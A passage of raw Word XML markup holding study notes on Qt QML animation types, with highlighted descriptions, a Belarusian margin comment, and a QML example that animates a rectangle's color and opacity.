      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smoothly track</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2452" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SpringAnimation</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Allows a property to track a value in a spring-like motion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2453" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ScriptAction</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Runs scripts during an animation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Types that animate properties based on data types</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8189"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520"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>
      <w:tr w:rsidR="0018577B" w:rsidRPr="002230B8" w:rsidTr="0018577B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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8577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2454" w:history="1">
              <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>AnchorAnimation</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8577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018577B">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Animates changes in anchor values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018577B" w:rsidRPr="002230B8" w:rsidTr="0018577B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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8577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2455" w:history="1">
              <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ParentAnimation</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8577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018577B">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Animates changes in parent values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018577B" w:rsidRPr="002230B8" w:rsidTr="0018577B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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8577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2456" w:history="1">
              <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>PathAnimation</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8577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018577B">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Animates an item along a path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018577B" w:rsidRPr="002230B8" w:rsidTr="0018577B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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8577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2457" w:history="1">
              <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ColorAnimation</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8577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018577B">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Animates changes in color values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018577B" w:rsidRPr="002230B8" w:rsidTr="0018577B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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8577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2458" w:history="1">
              <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>NumberAnimation</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8577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018577B">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Animates changes in qreal-type values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018577B" w:rsidRPr="002230B8" w:rsidTr="0018577B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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8577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2459" w:history="1">
              <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>PropertyAnimation</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8577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018577B">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Animates changes in property values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018577B" w:rsidRPr="002230B8" w:rsidTr="0018577B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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8577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2460" w:history="1">
              <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>RotationAnimation</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18577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018577B">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Animates changes in rotation values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018577B" w:rsidRPr="002230B8" w:rsidTr="0018577B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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8577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2461" w:history="1">
              <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Vector3dAnimation</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18577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018577B">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Animates changes in QVector3d values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Animations are created by </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>applying animation types to property values</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Animation types will </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interpolate</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> property values to create smooth transitions. As well, </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state transitions may assign animations to state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To create an animation, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use an appropriate animation type for the type of the property</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is to be animated, and apply the animation depending on the type of behavior that is required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="00DC3801">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2086" w:name="triggering-animations"/>
      <w:bookmarkStart w:id="2087" w:name="_Toc483000982"/>
      <w:bookmarkStart w:id="2088" w:name="_Toc483003973"/>
      <w:bookmarkStart w:id="2089" w:name="_Toc483604324"/>
      <w:bookmarkStart w:id="2090" w:name="_Toc483605544"/>
      <w:bookmarkEnd w:id="2086"/>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Triggering Animations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2087"/>
      <w:bookmarkEnd w:id="2088"/>
      <w:bookmarkEnd w:id="2089"/>
      <w:bookmarkEnd w:id="2090"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00183F18">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>several ways of setting animation</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an object.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="00AA0658">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2091" w:name="direct-property-animation"/>
      <w:bookmarkStart w:id="2092" w:name="_Toc483000983"/>
      <w:bookmarkStart w:id="2093" w:name="_Toc483003974"/>
      <w:bookmarkStart w:id="2094" w:name="_Toc483604325"/>
      <w:bookmarkStart w:id="2095" w:name="_Toc483605545"/>
      <w:bookmarkEnd w:id="2091"/>
      <w:r w:rsidRPr="00AA0658">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Direct Property Animation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2092"/>
      <w:bookmarkEnd w:id="2093"/>
      <w:bookmarkEnd w:id="2094"/>
      <w:bookmarkEnd w:id="2095"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="00183F18" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Animations are created by </w:t>
      </w:r>
      <w:r w:rsidRPr="00183F18">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>applying animation objects to property values</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gradually change the properties over time. These</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0658">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>roperty animations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0658">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0658">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apply smooth movements by interpolating values</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between property value changes. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0658">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property animations provide timing controls and allows different interpolations through</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0658">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2462" w:anchor="qml-easing-animation" w:history="1">
        <w:r w:rsidRPr="00AA0658">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>easing curves</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00183F18">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA0658" w:rsidRPr="00AA0658">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00183F18" w:rsidRPr="00AA0658">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Анімацыя рэалізавана праз інтэрпаляцыю і таймер. Мне ясна тэхналогія.</w:t>
      </w:r>
      <w:r w:rsidR="00AA0658" w:rsidRPr="00AA0658">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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flashingblob</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width</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75</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height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75</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color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"blue"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    opacity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MouseArea</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anchors</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fill</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parent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onClicked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animateColor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start</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animateOpacity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start</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PropertyAnimation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animateColor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target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flashingblob</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properties</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"color"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to</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"green"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duration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NumberAnimation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animateOpacity</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target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flashingblob</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properties</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"opacity"</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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0.99</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to</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loops</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Animation</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
